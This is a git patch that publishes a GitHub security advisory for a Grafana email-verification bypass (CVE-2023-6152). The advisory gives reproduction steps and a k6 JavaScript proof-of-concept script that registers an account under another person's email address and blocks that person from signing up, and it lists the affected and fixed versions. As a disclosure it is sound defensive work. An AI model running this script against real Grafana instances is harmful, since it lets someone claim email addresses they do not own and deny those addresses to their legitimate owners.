From 44311d27602c305000436ed9afde8bbc7aa757ad Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Tue, 13 Feb 2024 22:26:25 +0000 Subject: [PATCH] Publish GHSA-3hv4-r2fm-h27f --- .../GHSA-3hv4-r2fm-h27f.json | 133 ++++++++++++++++++ 1 file changed, 133 insertions(+) create mode 100644 advisories/github-reviewed/2024/02/GHSA-3hv4-r2fm-h27f/GHSA-3hv4-r2fm-h27f.json diff --git a/advisories/github-reviewed/2024/02/GHSA-3hv4-r2fm-h27f/GHSA-3hv4-r2fm-h27f.json b/advisories/github-reviewed/2024/02/GHSA-3hv4-r2fm-h27f/GHSA-3hv4-r2fm-h27f.json new file mode 100644 index 0000000000000..bd6a93d7ea8f8 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-3hv4-r2fm-h27f/GHSA-3hv4-r2fm-h27f.json @@ -0,0 +1,133 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3hv4-r2fm-h27f", + "modified": "2024-02-13T22:25:10Z", + "published": "2024-02-13T22:25:10Z", + "aliases": [ + "CVE-2023-6152" + ], + "summary": "Email Validation Bypass And Preventing Sign Up From Email's Owner", + "details": "### Summary\nEmail validation can easily be bypassed because `verify_email_enabled` option enable email validation at sign up only.\nA user changing it's email after signing up (and verifying it) can change it without verification in `/profile`.\nThis can be used to prevent legitimate owner of the email address from signing up.\n\nAnother way to prevent email's owner from signing up is by setting Username as an email:\nWhen a new user is registrering, they can set two different email addresses in the Email and Username field, technically having 2 email addresses (because Grafana handles usernames and emails the same in some situations), but only the former is validated.\n\n![](https://user-images.githubusercontent.com/44581623/282073913-c1a8c20b-b6c3-46eb-840c-9e0dae718a2a.png)\n\nHere user a prevents owner of bar@example.com to signup.\n\n### Details\nI don't know exact location but this is related to PUT /api/user handler.\n\n### PoC\nBypass email validation:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change email to bar@example.com\n* That's it, your using an email you don't own.\n\nPrevent email's owner from signing up:\n* Start a new grafana instance using latest version\n* Sign up with email foo@example.\n* Login to that account.\n* Go to profile and change username (not email) to [bar@example.com](mailto:bar@example.com)\n* Signout.\n* Try to sign up with email [b@example.com](mailto:b@example.com)\n* Warning popup \"User with same email address already exists\"\n\nK6 script (with `verify_email_enabled` set to `false`):\n```js\nimport { check, group } from \"k6\"\nimport http from \"k6/http\"\n\nexport const options = {\n scenarios: {\n perVuIter: {\n executor: 'per-vu-iterations',\n vus: 1,\n iterations: 1\n }\n }\n}\n\nconst GRAFANA_URL = __ENV.GRAFANA_URL || \"http://localhost:3000\"\n\nexport default function () {\n group(\"create user_a with email foo@example.com\", () => {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"foo@example.com\",\n \"password\": \"password\"\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200\n })\n })\n\n group(\"change user_a login to bar@example.com\", () => {\n const response = http.put(`${GRAFANA_URL}/api/user`, JSON.stringify({\n \"email\": \"foo@example.com\",\n \"login\": \"bar@example.com\", // user_b email.\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200\n })\n })\n\n http.cookieJar().clear(GRAFANA_URL)\n\n group(\"create user_b with email bar@example.com\", () => {\n const response = http.post(`${GRAFANA_URL}/api/user/signup/step2`, JSON.stringify({\n \"email\": \"bar@example.com\",\n \"username\": \"bar@example.com\",\n \"password\": \"password\"\n }), {\n headers: {\n 'Content-Type': \"application/json\"\n }\n })\n\n check(response, {\n 'status code is 200': (r) => r.status == 200 // fail\n })\n })\n}\n```\n\n### Impact\nBypass email verification.\nPrevent legitimate owner from signing up.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.5.0" + }, + { + "fixed": "9.5.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.0.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.1.0" + }, + { + "fixed": "10.1.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.2.0" + }, + { + "fixed": "10.2.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.3.0" + }, + { + "fixed": "10.3.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/grafana/bugbounty/security/advisories/GHSA-3hv4-r2fm-h27f" + }, + { + "type": "PACKAGE", + "url": "https://github.com/grafana/grafana" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-13T22:25:10Z", + "nvd_published_at": null + } +} \ No newline at end of file